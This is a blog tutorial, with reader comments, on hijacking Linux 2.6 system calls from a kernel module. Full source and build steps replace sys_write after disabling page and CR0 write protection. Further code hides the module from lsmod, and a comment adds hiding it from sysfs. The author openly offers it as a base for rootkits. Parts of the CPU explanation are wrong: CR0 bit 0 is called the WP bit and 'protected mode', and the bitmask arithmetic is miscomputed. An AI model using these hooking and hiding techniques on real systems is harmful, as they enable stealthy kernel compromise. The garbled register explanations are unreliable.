Home > C/C++, GNU/Linux, Programming, Security > Syscall Hijacking: Kernel 2.6.* systems

Syscall Hijacking: Kernel 2.6.* systems

In this guide I will explain how to hijack the syscall in kernel 2.6.*: in particular how to bypass the kernel write protection and the “protected mode” bit of the CR0 CPUs register.
I don’t explain what is a syscall or syscall table: I assume you know what it is.

– Accessing to Syscall Table

If you have tried to execute rootkit wrote for 2.4.* kernels then you will know that them don’t work in the 2.6.* kernel systems.
In kernel 2.6.* the “sys_call_table” is no longer exported and you can’t access it directly: moreover the memory pages in which the table resides are now write-protected.
So we can no longer access the table in this way:

extern void *sys_call_table[];
...
sys_call_table[__NR_syscall] = pointer

But the table is still in the memory: if we know its memory address we can access it through a simple pointer. There are a lot of methods to find this address: the simplest is searching inside the “System.map” file in the “/boot” directory. This file is created each time a kernel is compiled: it contains all the symbols and their addresses used by the kernel.
The output of this file follows:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic
...
c018d140 t cgroup_remount
c018d260 T cgroup_path
c018d310 t allocate_cg_links
c018d410 t find_css_set
c018d7d0 T cgroup_attach_task
c018da40 T cgroup_clone
c018dcc0 t cgroup_tasks_write
c018dd90 t cgroup_release_agent
c018df50 t proc_cgroup_show
c018e180 t cgroup_pidlist_find
c018e320 t cgroup_write_event_control
c018e610 t pidlist_allocate
c018e640 t pidlist_array_load
...

We are only interested at the “sys_call_table” address:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep sys_call_table
c05d2180 R sys_call_table

– Bypass Kernel Write Protection

Now we have the table’s address: but if you have looked at the “grep” command you will have seen that there is an ‘R’: this means that this address is “read-only”.
Indeed the kernel poses some structures in the “read-only” memory zone: in this way it protects them against intentional or unintentional changes which can lead to system instability. So we have to set this structure in “read/write” mode if we want to modify them.
Fortunately, the kernel provides us with special functions for this task:

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc012fe80;

The “pages_rw” function sets the write mode on the page passed as an argument; the second one sets the read mode on the page passed as an argument. Bu we need the virtual address of the page in order to use it: we can use for this task the “virt_to_page()” function, that converts the virtual address of the page in the corresponding physical page of memory accessible by the kernel. In order to use the “pages_*” functions we have to know their addresses. We can obtain them from the “System.map” file:

spaccio@spaccio-laptop:~$ cat /boot/System.map-2.6.35-23-generic | grep -e pages_rw -e pages_ro
c012fbb0 T set_pages_rw
c012fe80 T set_pages_ro

Now we can access and modify the sys_call_table in this way:

...

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

...

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc012fe80;

...

static int init(void)
{

    struct page *_sys_call_page;
    printk(KERN_ALERT "\nHIJACK INIT\n");

    _sys_call_page = virt_to_page(&syscall_table);

    pages_rw(_sys_call_page, 1);
    
    // now we can use the sys_call_table
    
    ...
}    

This is an example source code (hijack.c):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> 
#include <linux/errno.h> 
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>  
#include <asm/page.h>  
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

void (*pages_rw)(struct page *page, int numpages) =  (void *) 0xc012fbb0;
void (*pages_ro)(struct page *page, int numpages) =  (void *) 0xc012fe80;

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) {

    // hijacked write

    printk(KERN_ALERT "WRITE HIJACKED");

    return (*original_write)(fd, buf, count);
}

static int init(void) {

    struct page *sys_call_page_temp;

    printk(KERN_ALERT "\nHIJACK INIT\n");

    sys_call_page_temp = virt_to_page(&syscall_table);
    pages_rw(sys_call_page_temp, 1);

    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = new_write;  

    return 0;
}

static void exit(void) {

    struct page *sys_call_page_temp;
   
    sys_call_page_temp = virt_to_page(syscall_table);
    syscall_table[__NR_write] = original_write;  
    pages_ro(sys_call_page_temp, 1);
    
    printk(KERN_ALERT "MODULE EXIT\n");

    return;
}

module_init(init);
module_exit(exit);

Here is a “Makefile” to compile the source code:

obj-m	:= hijack.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko

– Bypass CR0 Protection

Some CPUs have the 0-bit of the CR (control register) set to 0: this means that “protected mode” is enabled. The “protected mode” was introduced in Intel CPUs starting from Intel 80286. This bit is also called wp-bit: we can check if our CPU support this kind of protection in this way:

spaccio@spaccio-laptop:~$ cat /proc/cpuinfo | grep wp
wp		: yes
wp		: yes

You can find here a brief description of the CR0 register. Reading from wikipedia you can see that bit 0 (WP) is the one that deals with the “protected mode”: if WP is set to 1 then the CPU is in “write-protect” mode; else it is in “read/write” mode.
If the CPU is in “write-protect” mode and if we try to load the “hijack.ko” module, the kernel will kill it:

spaccio@spaccio-laptop:~$ sudo insmod hijack.ko
Killed

So if we set this bit to 0 we will have access to the memory pages (including the syscall table) in write mode.
Again the kernel provides us two functions:

#define read_cr0 () (native_read_cr0 ())
#define write_cr0 (x) (native_write_cr0 (x))

The native read/write functions are defined as follows:

static inline unsigned long native_read_cr0 (void)
{
         unsigned long val;
         asm volatile("movl %%cr0,%0\n\t" :"=r" (val));
         return val;
}

static inline void native_write_cr0 (unsigned long val)
{
         asm volatile("movl %0,%%cr0": :"r" (val));
}

The “read_cr0” function returns the value of the register CR0; the “write_cr0” function sets the bits of the register based on the value passed as parameter.
Now we can enable/disable the protected mode in such way:

/* disable protected mode

   I perform a not operation to 0x10000 ( so I have 0x01111). 
   Later I perform an AND operation between the current value 
   of the CR0 register and 0x01111. So the WP bit is set to 0 
   and the protected mode is disabled.

*/

write_cr0 (read_cr0 () & (~ 0x10000));

/* enable protected mode

   I perform an OR operation between the current value of 
   the CR0 register and 0x10000. So the WP bit is set to 1 
   and the protected mode is enabled.
   
*/
   
write_cr0 (read_cr0 () | 0x10000);

Follows “hijack.c” modified (“hijack2.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> 
#include <linux/errno.h> 
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>  
#include <asm/page.h>  
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>

unsigned long *syscall_table = (unsigned long *)0xc05d2180; 

asmlinkage int (*original_write)(unsigned int, const char __user *, size_t);

asmlinkage int new_write(unsigned int fd, const char __user *buf, size_t count) {

    // hijacked write

    printk(KERN_ALERT "WRITE HIJACKED");

    return (*original_write)(fd, buf, count);
}

static int init(void) {

    printk(KERN_ALERT "\nHIJACK INIT\n");

    write_cr0 (read_cr0 () & (~ 0x10000));

    original_write = (void *)syscall_table[__NR_write];
    syscall_table[__NR_write] = new_write;  

    write_cr0 (read_cr0 () | 0x10000);

    return 0;
}

static void exit(void) {

    write_cr0 (read_cr0 () & (~ 0x10000));

    syscall_table[__NR_write] = original_write;  

    write_cr0 (read_cr0 () | 0x10000);
    
    printk(KERN_ALERT "MODULE EXIT\n");

    return;
}

module_init(init);
module_exit(exit);

Makefile:

obj-m	:= hijack2.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

Now we can load our module without problems:

spaccio@spaccio-laptop:~$ sudo insmod hijack2
spaccio@spaccio-laptop:~$ 

– Hide Kernel Module

We can simply hide our module: we can remove it from the module list (lsmod and /proc/modules). Look at the following source code (“hijack3.c”):

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h> 
#include <linux/errno.h> 
#include <linux/types.h>
#include <linux/unistd.h>
#include <asm/cacheflush.h>  
#include <asm/page.h>  
#include <asm/current.h>
#include <linux/sched.h>
#include <linux/kallsyms.h>


static int init(void) {

    list_del_init(&__this_module.list);

    return 0;
}

static void exit(void) {

    return;
}

module_init(init);
module_exit(exit);

We compile and run it:

obj-m	:= hijack3.o

KDIR    := /lib/modules/$(shell uname -r)/build
PWD    := $(shell pwd)

default:
	$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

If we try to look through lsmod we cannot find our module:

spaccio@spaccio-laptop:~$ sudo insmod hijack3
spaccio@spaccio-laptop:~$ lsmod
Module                  Size  Used by
kernel_redir            2200  1 
aes_i586                7280  2 
aes_generic            26875  1 aes_i586
rfcomm                 33811  6 
binfmt_misc             6599  1 
sco                     7998  2 
bnep                    9542  2 
l2cap                  37008  16 rfcomm,bnep
vboxnetadp              6454  0 
vboxnetflt             15216  0 
...
spaccio@spaccio-laptop:~$ lsmod |grep hijack3.ko
spaccio@spaccio-laptop:~$

This happens thanks to “list_del_init()” function. This function is defined as follows:

static inline void list_del_init (struct list_head * entry)
{
	 __list_del (entry->prev, entry->next);
	 INIT_LIST_HEAD (entry);
}

While the “__list_del()” and “INIT_LIST_HEAD()” functions are defined as follows:

static inline void __list_del (struct list_head * prev, struct list_head * next)
{
	 next-> prev = prev;
	 prev-> next = next;
}

static inline void INIT_LIST_HEAD (struct list_head * list)
{
	 list-> next = list;
	 list-> prev = list;
}

So the “list_del_init()” function removes the name of our module from the doubly linked list that manages the list of modules: in this way can not be found by lsmod (or in /proc/modules).

– Conclusion

The post is finished and I hope that it can help you to write your own modules (or rootkit :) ).
Bye.

  1. December 3, 2010 at 21:56

    great work mate :)

  2. December 8, 2010 at 16:16

    great work, is very nice topic

  3. December 13, 2010 at 20:26

    hi,
    when i try doing this trick on my box, thereis a few questions in my dumb brain:
    – why u are using 0x10000 value when try to enable/disable cr0 on protected mode?
    – if only ‘disable cr0 wp’ trick can bypass protection of at all.
    why still need to disable page protection by ‘pages_rw((virt_to_pages…. ‘?

    • December 13, 2010 at 23:10

      Hi Vjick, I have modified the post after your comment:
      – now you can read the answer from the post;
      – we don’t still need to disable the page protection with ‘pages_rw((virt_to_pages…. ‘: I have made a mistake in “cut & paste”.
      Bye bye.

      • Vjick Nzr
        December 16, 2010 at 13:09

        thanks for your reply, styx^..
        btw, i can understand how the logic of AND,OR,and negation(~) in manipulating cpu register.
        but im still confuse, why that 5th bit[(0x00010000) -cmiiw-] from the register value must be 1, while PE flags is in bit 0 and WP flags is in bit 16 (according to http://en.wikipedia.org/wiki/Control_register#CR0).

        how can that happen? ;p

  4. December 16, 2010 at 13:17

    or maybe in overall, why the value must be [0x01111 / 0x10000] not [0x01111111 / 0x10000000] like in the common bit x86 cpu register to perform enable/disable PE?

    thanks you, just confusing question in my humble-dumble head..

    Vjick Nzr :
    thanks for your reply, styx^..
    btw, i can understand how the logic of AND,OR,and negation(~) in manipulating cpu register.
    but im still confuse, why that 5th bit[(0x00010000) -cmiiw-] from the register value must be 1, while PE flags is in bit 0 and WP flags is in bit 16 (according to http://en.wikipedia.org/wiki/Control_register#CR0).
    how can that happen? ;p

    • December 16, 2010 at 15:18

      Hi Vjick:

      – 0x10000 (exadecimal) stands for 000…010000000000000000 (binary)
      – ~(0x10000) stands for 111…1101111111111111111

      As you can see the 17th bit (WP) is set to 0. So you can write in the memory pages previously in read-only mode.

      Bye bye.

      • December 16, 2010 at 18:27

        yeah.. my fault, i jst wrong while convert(negationing) value in hex, not binary.
        thanks you, styx.

  5. sj
    December 17, 2010 at 17:50

    Instead of using hardcoded addresses you could parse memory beetween 0xc0000000 and 0xd0000000 (x86) and check for syscall table.

    • January 18, 2011 at 13:36

      You are right. Soon I’ll write a post about it.
      Thank you for the hint.

  6. Raingarden9
    December 31, 2010 at 02:02

    Nice post.

    On a side note Centos5.5 (probably other RH based distros?) does not provide pages_rw() and pages_ro() functions.

    • January 18, 2011 at 13:39

      I don’t know how the Centos5.5 kernel works.
      If you have tested my codes and they don’t work then you could/should be right :-).

  7. eeknay
    February 21, 2011 at 22:41

    Absolutely awesome writeup!!!

  8. Igor
    March 6, 2011 at 22:45

    Will/can this method be used for hijacking kernel functions (not syscalls) given their address from System.map? If so, can you point me how to replace a function call with given address and parameter list?

    • March 7, 2011 at 00:52

      Yes, you can do that, but I’ve never tried it. I think that the steps are the same of the syscall hijacking.
      Bye.

  9. Chameleon
    March 7, 2011 at 05:05

    Great writeup.
    One question, can this method be done on a 64 bit machine.
    pages_rw
    pages_ro
    Doesn’t exist in the System.map. What would be the equiv?

    • March 7, 2011 at 12:36

      I don’t know the answer because I don’t have a 64 bit machine. Have you searched for set_memory_rw() and set_memory_ro() functions?
      Bye.

      • Igor
        March 7, 2011 at 15:19

        I run 64-bit too.. have the following page/memory functions for 2.6.36:
        ffffffff8102f1f0 T set_pages_rw
        ffffffff8102ebe0 T set_memory_rw
        ffffffff81a7c6b0 r __ksymtab_set_memory_rw
        ffffffff81a8bdf8 r __kcrctab_set_memory_rw
        ffffffff81a909e8 r __kstrtab_set_memory_rw
        .
        ffffffff8102f1b0 T set_pages_ro
        ffffffff8102ebb0 T set_memory_ro
        ffffffff81a7c6c0 r __ksymtab_set_memory_ro
        ffffffff81a8be00 r __kcrctab_set_memory_ro
        ffffffff81a909f6 r __kstrtab_set_memory_ro

        Which one is correct to use? set_pages_xx or set_memory_xx?

      • March 7, 2011 at 17:57

        You have to use set_pages_xx as you can read in the post.
        These functions are defined in “arch/x86/mm/pageattr.c”:

        int set_pages_ro(struct page *page, int numpages)
        {
        unsigned long addr = (unsigned long)page_address(page);

        return set_memory_ro(addr, numpages);
        }

        int set_pages_rw(struct page *page, int numpages)
        {
        unsigned long addr = (unsigned long)page_address(page);

        return set_memory_rw(addr, numpages);
        }

        As you can see they call the set_memory_xx functions.
        Bye.

  10. Igor
    March 7, 2011 at 18:18

    It seems that including provides native read_cr0 && write_cr0 calls, that was enough to replace some function’s call with my own, without using set_memory/set_page family. However, for some reason I suppose that replaced function didn’t receives the passed variables.. cheers.

    • Igor
      March 7, 2011 at 18:54

      Fixed: <asm/system.h>

  11. fdb
    March 15, 2011 at 01:50

    Modules are not hidden in sysfs

    • amg
      June 11, 2012 at 05:57

      you can use :

      kobject_del(__this_module.holders_dir->parent);

  12. N. A. Joshi
    August 21, 2011 at 17:37

    Dear Blog-Author,
    What a beautiful article this is! The way you have poured the concept is inspirative.
    I liked this page, and the content remained helpful to me. I am thankful to you.

    Thanks.
    N. A. Joshi

  13. ph-n00b
    May 12, 2012 at 22:56

    thanks for sharing very much appreciated – mabuhay

  14. December 10, 2013 at 04:20

    Excellent Motorbike Site I like it Merci

  15. October 1, 2014 at 19:20

    I do believe all the ideas you’ve introduced on your post.
    They are very convincing and can definitely work. Still, the posts are
    too brief for beginners. Could you please lengthen them a bit from subsequent time?
    Thanks for the post.

  1. December 20, 2010 at 07:52
  2. December 28, 2010 at 15:00
  3. January 20, 2011 at 20:30
  4. February 10, 2011 at 12:50
  5. March 22, 2011 at 15:47
  6. November 17, 2013 at 11:39
  7. November 17, 2013 at 17:26
  8. December 28, 2013 at 19:27
  9. April 3, 2016 at 18:36

Leave a reply to Vjick Nzr Cancel reply